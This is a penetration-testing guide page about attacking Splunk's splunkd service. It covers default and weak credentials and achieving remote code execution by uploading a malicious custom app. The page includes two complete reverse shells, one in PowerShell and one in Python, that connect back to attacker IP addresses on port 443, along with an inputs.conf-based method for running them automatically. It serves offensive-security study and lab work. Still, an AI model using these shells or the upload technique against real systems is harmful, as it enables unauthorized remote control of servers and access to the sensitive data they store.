8089 - Pentesting Splunkd

Reading time: 4 minutes

Basic Information

• Log analytics tool used for data gathering, analysis, and visualization
• Commonly used in security monitoring and business analytics
• Default ports:
  • Web server: 8000
  • Splunkd service: 8089

Vulnerability Vectors:

1. Free Version Exploitation

• Trial version automatically converts to free version after 60 days
• Free version lacks authentication
• Potential security risk if left unmanaged
• Administrators may overlook security implications

2. Credential Weaknesses

• Older versions: Default credentials admin:changeme
• Newer versions: Credentials set during installation
• Potential for weak password use (e.g., admin, Welcome, Password123)

3. Remote Code Execution Opportunities

• Multiple code execution methods:
  • Server-side Django applications
  • REST endpoints
  • Scripted inputs
  • Alerting scripts
• Cross-platform support (Windows/Linux)
• Scripted inputs can run:
  • Bash scripts
  • PowerShell scripts
  • Batch scripts

Key Exploitation Potential:

• Sensitive data storage
• Lack of authentication in free version
• Multiple vectors for potential remote code execution
• Possibility of leveraging scripted inputs for system compromise

Shodan

• Splunk build

RCE

Create Custom Application

Splunk offers a sophisticated method for remote code execution through custom application deployment, leveraging its cross-platform scripting capabilities. The core exploitation technique revolves around creating a malicious application that can execute reverse shells on both Windows and Linux systems.

A custom application can run Python, Batch, Bash, or PowerShell scripts. Moreover, Splunk comes with Python installed, so even in Windows systems you will be able to run python code.

You can use this example with the bin containing example for Python and PowerShell. Or you could create your own.

The exploitation process follows a consistent methodology across platforms:

splunk_shell/
├── bin        (reverse shell scripts)
└── default    (inputs.conf configuration)

The critical configuration file inputs.conf enables the script by:

• Setting disabled = 0
• Configuring a 10-second execution interval
• Defining the script's source type

Deployment is straightforward:

1. Create the malicious application package
2. Set up a listener (Netcat/socat) on the attacking machine
3. Upload the application through Splunk's interface
4. Trigger automatic script execution upon upload

Sample Windows PowerShell reverse shell:

$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
  $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
  $sendback = (iex $data 2>&1 | Out-String );
  $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
  $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
  $stream.Write($sendbyte,0,$sendbyte.Length);
  $stream.Flush()
};
$client.Close()

Sample Linux Python reverse shell:

import sys, socket, os, pty
ip = "10.10.14.15"
port = "443"
s = socket.socket()
s.connect((ip, int(port)))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn('/bin/bash')

RCE & Privilege Escalation

In the following page you can find an explanation how this service can be abused to escalate privileges and obtain persistence:

Splunk LPE and Persistence

References

• https://academy.hackthebox.com/module/113/section/1213